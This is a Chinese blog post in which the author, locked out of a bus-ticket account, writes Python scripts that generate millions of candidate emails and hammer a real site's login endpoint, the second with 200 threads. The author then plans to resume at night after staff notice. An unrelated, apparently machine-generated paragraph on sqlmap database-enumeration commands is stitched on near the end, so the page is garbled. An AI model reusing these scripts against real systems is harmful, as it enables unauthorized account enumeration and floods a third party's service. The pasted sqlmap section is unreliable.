暴力破解黄巴登录网站

在APP上申请了一个黄巴帐号,由于email输错了,导致买了七天的票不能使用,想找回, 公司却说只能找回密码,不能找回帐号,黄巴的网站也像一坨屎,居然email不经过验证直接可以用,导致你输错了都不知道,于是不甘心白白亏掉自己的12镑于是决定,暴力破解之。


先用Python生成帐号字典:


import os
from string import ascii_lowercase

pds=[]


rg=ascii_lowercase
for first in rg:
    for second in rg:
        for third in rg:
            for fourth in rg:
                for fifth in rg:
                    num= "tjiang@b%s%s%s%s%smouth.ac.uk"%(first,second,third,fourth,fifth)
                    pds.append(num)



file_object = open('user.txt', 'w')
file_object.writelines(['%s%s' % (x,'\n') for x in pds])
#file_object.writelines(['%s%s' % (x,os.linesep) for x in pds])
file_object.close( )

然后呢, 用firefox中的httpfox来查看下它的登录封包



然后构造程序模拟登录,暴力破解之


import requests


def Login(user):
   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'********', 'register':'Login Now'})
   if 'Invalid' in r.text:
      isFind = False
   else:
      isFind = True
   return isFind

fpath=r'C:\Users\RaiderJ\Desktop\crack\user.txt'
pfile=open(fpath,'r')
correct_set = set()
for oneUser in pfile.readlines():
    if Login(oneUser):
       print 'success-' + oneUser
       correct_set.add(oneUser)
    else:
       print 'failed-' + oneUser

thefile = open('correct.txt', 'w')
for item in correct_set:
  thefile.write("%s\n" % item)
thefile.close()


好了, 开始遍历了。 不过貌似单线程速度很慢,后面让我们开始多线程,并行破解吧



多线程程序


import threading
import Queue

import requests
mutex = threading.Lock()
#Number of threads
n_thread = 200
#Create queue
queue = Queue.Queue()

def Login(user):
   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'*******', 'register':'Login Now'})
   if 'Invalid' in r.text:
      isFind = False
   else:
      isFind = True
   return isFind

def WriteOut(user):
   with open(r"C:\Users\seamanj\Desktop\crack\correct.txt", "a") as myfile:
      myfile.write(user)
      myfile.close()
   
   
class ThreadClass(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
    #Assign thread working with queue
        self.queue = queue

    def run(self):
        while True:
        #Get from queue job
            oneUser = self.queue.get()
            print self.getName() + ':get' + str(queue.qsize()) + '\n'
            if Login(oneUser):
               print 'success-' + oneUser + '\n'
               if mutex.acquire():
                  WriteOut(oneUser)
                  mutex.release()
            else:
               print 'failed-' + oneUser + '\n'
            self.queue.task_done()
#Create number process
for i in range(n_thread):
    t = ThreadClass(queue)
    t.setDaemon(True)
    #Start thread
    t.start()

#Read file line by line
hostfile = open("user.txt","r")
for line in hostfile:
    #Put line to queue
    queue.put(line)
    print 'put' + str(queue.qsize()) + '\n'
#wait on the queue until everything has been processed 
queue.join()


不过好像连接太频繁了, 被工作人员发现了尴尬



还是等到夜里, 或者过节的时候再crack吧

引用中提到,与暴力破解表名类似,暴力跑的列名可以在txt/common-columns.txt中找到。这个文件包含了一些常见的列名。而引用和引用提到了sqlmap的两个命令,分别是使用--current-db来获取当前数据库的名称,使用--dbs来获取所有的数据库名称。综合这些信息,可以使用sqlmap来进行暴力破解。 使用sqlmap的暴力破解功能,可以帮助我们获取目标数据库的信息。首先,我们需要使用sqlmap的-u参数指定目标链接,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"。然后,使用--current-db命令获取当前数据库的名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db。最后,使用--dbs命令获取所有的数据库名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs。 通过以上步骤,我们可以使用sqlmap来进行暴力破解,获取目标数据库的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqlmap用户手册(七)——爆破等](https://blog.csdn.net/zhaolina004/article/details/14616263)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [实训实训实训](https://blog.csdn.net/IWANnaaa/article/details/123937562)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值